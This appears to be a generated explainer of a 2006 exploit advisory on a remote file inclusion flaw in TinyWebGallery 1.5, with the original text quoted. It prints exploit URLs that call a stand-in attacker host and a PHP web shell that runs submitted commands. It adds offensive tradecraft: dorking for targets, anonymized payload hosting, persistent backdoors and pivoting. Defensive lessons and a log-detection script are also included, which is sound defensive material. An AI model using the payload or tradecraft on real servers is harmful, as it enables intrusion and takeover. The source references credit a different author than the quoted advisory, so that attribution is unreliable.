TinyWebGallery 1.5 Remote File Inclusion Explained

What this paper is
This paper details a vulnerability in TinyWebGallery version 1.5. Specifically, it describes a "Remote File Inclusion" (RFI) flaw in the image.php script. This means an attacker can trick the vulnerable script into including and executing code from a remote server.
Simple technical breakdown
The core of the vulnerability lies in how the image.php script handles user input. It takes a parameter named image and uses it directly in an include statement without proper sanitization.
The include statement in PHP is designed to pull in and execute code from another file. When an attacker can control the filename passed to include, they can point it to a malicious script hosted on their own server. The vulnerable script then fetches and runs this remote script, effectively giving the attacker control.
Complete code and payload walkthrough
The provided code snippet is very concise.
<?php
include ($image . ".txt");
?>
- <?php ... ?>: This denotes a block of PHP code.
- include ($image . ".txt");: This is the critical line.
- $image: This is a PHP variable. In the context of a web script, this variable is expected to be populated by user input, typically from a URL parameter.
- . : This is the string concatenation operator in PHP. It joins two strings together.
- ".txt": This is a literal string representing the file extension ".txt".
- include(...): This is a PHP construct. It takes a string as an argument, which is treated as a filename. PHP then attempts to include and execute the content of that file.
Mapping list:
- <?php ... ?> -> PHP code block delimiters.
- include ($image . ".txt"); -> The vulnerable function call that attempts to include a file.
- $image -> User-controlled input variable.
- $image . ".txt" -> The constructed filename that is passed to include.
Exploit Example Breakdown:
The exploit examples provided are:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts
http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?
- http://www.site.com/[path]/examples/image.php: This is the URL to the vulnerable script on the target website.
- ?image=: This indicates the start of URL parameters. image is the name of the parameter being passed.
- http://evil_scripts: This is the attacker-controlled URL. When this is passed to the vulnerable image.php script, the $image variable will contain http://evil_scripts. include ($image . ".txt"); becomes include ("http://evil_scripts" . ".txt");, which PHP interprets as include ("http://evil_scripts.txt");.
If the web server is configured to allow include to fetch remote files (which was common in older PHP configurations), it will attempt to download and execute the content from http://evil_scripts.txt. The attacker would host a malicious PHP script at this URL.
The second example image.php2?image=http://evil_scripts? seems to have a typo in the script name (image.php2 instead of image.php) and an extra ? at the end of the attacker's URL. The core vulnerability remains the same.
Payload:
The "payload" in this context isn't a specific byte sequence like traditional shellcode. Instead, the payload is a malicious PHP script hosted on the attacker's server. When included by the vulnerable TinyWebGallery script, this remote PHP script will execute on the target server.
A common payload for RFI would be a web shell, allowing the attacker to execute commands on the server. For example, the attacker might host a file named evil.txt (or evil.php, depending on how the server processes includes) at http://evil_scripts/evil.txt with content like:
<?php
// Basic web shell
echo "<form method='post'><input type='text' name='cmd'><input type='submit' value='Run'></form>";
if(isset($_POST['cmd'])) {
system($_POST['cmd']);
}
?>
When the vulnerable script includes this, the web shell code runs on the target server.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No prior authentication to the web application is strictly necessary if the vulnerable script is publicly accessible.
- Lab Preconditions:
  - A target web server running TinyWebGallery v1.5 (or a similarly vulnerable version).
  - The target server must have PHP installed.
  - Crucially, the target server's PHP configuration must have allow_url_fopen and allow_url_include enabled. These directives control whether PHP can open remote files and include them, respectively. Older PHP versions often had these enabled by default or were misconfigured.
  - An attacker-controlled server capable of hosting a malicious PHP script.
- Tooling Assumptions:
  - A web browser for crafting and sending requests.
  - A simple HTTP server (e.g., Python's http.server, apache, nginx) to host the malicious payload.
  - A text editor for creating the payload.
- Execution Pitfalls:
  - allow_url_fopen/allow_url_include disabled: If these PHP directives are disabled on the target server, the RFI will fail. This is the most common defense against this type of vulnerability.
  - Incorrect Path: The [path] in the exploit URL must be correct, pointing to the directory where examples/image.php resides.
  - File Extension Mismatch: The vulnerability relies on appending .txt. If the attacker's payload is not named with a .txt extension (e.g., evil.php), the include might fail or execute the file differently depending on server configuration. However, the vulnerability is specifically about the inclusion of the remote file's content, so even if the remote file is .php, the .txt appended might still lead to execution if the server processes .txt files as PHP. The most reliable approach is to host the payload with a .txt extension.
  - WAF/IPS: Web Application Firewalls or Intrusion Prevention Systems might detect and block requests containing URLs in parameters.
  - URL Encoding: Special characters in the attacker's URL might need URL encoding.
- Tradecraft Considerations:
  - Reconnaissance: Use Google dorks ("powered by twg") to identify potential targets. Manually verify the TinyWebGallery version.
  - Payload Hosting: Host the payload on a disposable or anonymized server. Consider using a domain that doesn't immediately link back to the operator.
  - Stealth: If the goal is to maintain access, the initial RFI can be used to upload a more persistent backdoor (e.g., a PHP webshell) to the target server itself, rather than relying on the remote include.
  - Post-Exploitation: Once a web shell is achieved, pivot to local privilege escalation or lateral movement.
Where this was used and when
- Context: This vulnerability was relevant to websites using TinyWebGallery version 1.5, which was a popular, albeit simple, photo gallery script.
- Approximate Years: The paper was published in 2006. This type of RFI vulnerability was prevalent in web applications developed in the early to mid-2000s, especially those using PHP with less secure default configurations. Exploits targeting RFI were common during this period.
Defensive lessons for modern teams
- Input Validation and Sanitization: Never trust user input. Always validate and sanitize all data received from external sources, especially when it's used in file operations or database queries.
- Secure Configuration: Ensure PHP's allow_url_fopen and allow_url_include directives are disabled on production servers. This is a fundamental security hardening step.
- Least Privilege: Configure web servers and applications to run with the minimum necessary privileges.
- Regular Updates: Keep all web applications and their underlying frameworks (like PHP) updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including RFI attempts.
- Code Review: Conduct regular security code reviews to identify potential vulnerabilities like insecure file inclusion.
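The Python below is an added illustration, not code from the paper or from TinyWebGallery, covering both the mechanism in the technical breakdown and the validation and WAF lessons above: it flags the ?image=http://... request pattern in access-log lines the way a WAF or SIEM rule would (including double URL encoding, one of the pitfalls listed), and it shows the whitelist check a fixed image.php would apply to the image parameter before anything reaches include. The log lines, the gallery directory name and all function names are constructed for this example.

```python
import re
from pathlib import Path
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Values that must never reach include(): the paper's http:// payload plus other
# schemes and stream wrappers commonly seen in RFI attempts.
REMOTE_SCHEMES = ("http:", "https:", "ftp:", "ftps:", "php:", "data:", "expect:")
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")   # plain file stem only
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)')

# Constructed Apache-style access-log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Aug/2006:10:00:01 +0000] "GET /examples/image.php?image=holiday01 HTTP/1.1" 200 5120
203.0.113.9 - - [09/Aug/2006:10:00:07 +0000] "GET /examples/image.php?image=http://evil_scripts HTTP/1.1" 200 812
203.0.113.9 - - [09/Aug/2006:10:00:09 +0000] "GET /examples/image.php?image=http%253A%252F%252Fevil_scripts HTTP/1.1" 200 812
198.51.100.2 - - [09/Aug/2006:10:01:00 +0000] "GET /examples/image.php?image=../../etc/passwd HTTP/1.1" 200 61
"""

def is_rfi_value(value: str) -> bool:
    """True if the value names a remote resource; decoded twice to catch double encoding."""
    decoded = unquote(unquote(value)).strip().lower()
    return decoded.startswith(REMOTE_SCHEMES)

def find_rfi_attempts(log_text: str, param: str = "image") -> List[Tuple[str, str]]:
    """Return (client ip, decoded value) for each request whose `param` carries a URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("url")).query          # parse_qs decodes one layer
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if is_rfi_value(value):
                hits.append((m.group("ip"), unquote(value)))
    return hits

def safe_image_path(image: str, base_dir: str) -> Optional[Path]:
    """Whitelisting replacement for include($image . ".txt"): accept only a plain stem,
    build the path under base_dir, and confirm the resolved path stayed there."""
    if not SAFE_NAME.fullmatch(image):
        return None
    base = Path(base_dir).resolve()
    candidate = (base / f"{image}.txt").resolve()
    return candidate if candidate.parent == base else None

if __name__ == "__main__":
    for ip, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: image={value}")
```

The traversal request in the sample log is deliberately not reported: it is a different defect (local file inclusion) that the same whitelist in safe_image_path rejects, but the detector above only looks for remote inclusion.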
ASCII visual (if applicable)
+-----------------+      +--------------------+      +-------------------+
| Attacker Server |----->| Target Web Server  |----->| Vulnerable Script |
| (e.g., evil.com)|      | (e.g., site.com)   |      | (image.php)       |
+-----------------+      +--------------------+      +-------------------+
        ^                                                      |
        |                               (HTTP Request)         |
        |                   ?image=http://evil.com/payload.txt |
        |                                                      v
        |                                            +-------------------+
        |                                            | PHP Interpreter   |
        |                                            | (allow_url_fopen  |
        |                                            |  enabled)         |
        |                                            +-------------------+
        |                                                      |
        |                                            (include) |
        |                                                      v
        |                                            +-------------------+
        |                                            | Remote File Fetch |
        |                                            | (payload.txt)     |
        |                                            +-------------------+
        |                                                      |
        |                                            (Execute) |
        |                                                      v
        |                                            +-------------------+
        |                                            | Malicious Code    |
        |                                            | Execution         |
        +--------------------------------------------| (e.g., Web Shell) |
                                                     +-------------------+

Source references
- Paper ID: 2158
- Paper Title: TinyWebGallery 1.5 - 'image' Remote File Inclusion
- Author: Mehmet Ince
- Published: 2006-08-09
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2158
- Raw URL: https://www.exploit-db.com/raw/2158
Original Exploit-DB Content (Verbatim)
####################################################
# #
# #
# C Y B E R - W A R R i O R T I M #
# #
# #
####################################################
TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:
<?php
include ($image . ".txt");
?>
------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------
Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts
http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?
###########################################################################
# #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #
# #
###########################################################################
# milw0rm.com [2006-08-09]